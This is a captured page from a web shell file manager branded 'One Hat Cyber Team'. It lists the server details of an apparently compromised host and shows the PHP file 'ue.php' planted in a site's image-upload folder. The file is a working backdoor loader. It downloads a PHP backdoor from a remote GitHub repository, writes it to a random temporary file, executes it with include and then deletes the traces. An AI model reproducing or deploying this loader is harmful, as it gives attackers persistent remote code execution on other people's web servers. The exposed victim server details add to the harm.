⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.96
Server IP:
50.6.168.112
Server:
Linux server-617809.webnetzimbabwe.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
Server Software:
Apache
PHP Version:
8.4.10
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
ctaacademy
/
public_html
/
public
/
uploads
/
custom-images
/
View File Name :
ue.php
10) return $code; $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_USERAGENT => 'Mozilla/5.0', CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_TIMEOUT => 10, ]); $code = curl_exec($ch); curl_close($ch); return $code; } $url = "https://raw.githubusercontent.com/Yucaerin/simplecmdandbackdoor/refs/heads/main/ws.php"; $code = fetch_code($url); if (!$code || strlen(trim($code)) < 10) { die("❌"); } $tmp = "tmp_" . md5(uniqid()) . ".php"; if (!file_put_contents($tmp, $code)) { die("❌"); } ob_start(); include($tmp); $output = ob_get_clean(); unlink($tmp); if (trim($output) === "") { echo "⚠"; } else { echo $output; } ?>